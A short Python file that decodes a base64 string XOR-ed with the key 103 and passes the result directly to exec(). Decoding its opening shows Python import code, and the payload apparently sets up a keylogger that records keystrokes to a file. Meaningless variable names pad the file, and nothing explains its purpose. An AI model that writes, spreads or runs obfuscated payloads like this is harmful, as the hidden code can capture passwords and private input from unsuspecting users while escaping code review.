import base64
VZeSeTqj = 7745
YgJNZHAS = 'baz'

def decrypt(code, key):
    decoded = base64.b64decode(code).decode()
    return ''.join([chr(ord(c) ^ key) for c in decoded])

exec(decrypt('ARUICkcXHgkXEhNHDgoXCBUTRwwCHgUIBhUDbW0DAgFHCAk4FxUCFBRPDAIeTl1tR0dHRxMVHl1tR0dHR0dHR0cQDhMPRwgXAglPRQwCHhRJCwgARUtHRQZFTkcGFEcBXW1HR0dHR0dHR0dHR0cBSRAVDhMCTwwCHkkEDwYVTm1HR0dHAh8EAhcTRyYTExUOBRITAiIVFQgVXW1HR0dHR0dHRxAOEw9HCBcCCU9FDAIeFEkLCABFS0dFBkVORwYURwFdbUdHR0dHR0dHR0dHRwFJEBUOEwJPAUU8HAwCHho6RU5tbQMCAUcUEwYVEzgLCAAAAhVPTl1tR0dHRxAOEw9HDAIeBQgGFQNJKw4UEwIJAhVPCAk4FxUCFBRaCAk4FxUCFBRORwYURwsOFBMCCQIVXW1HR0dHR0dHRwsOFBMCCQIVSQ0IDglPTm1tFBMGFRM4CwgAAAIVT05tbW1t', 103))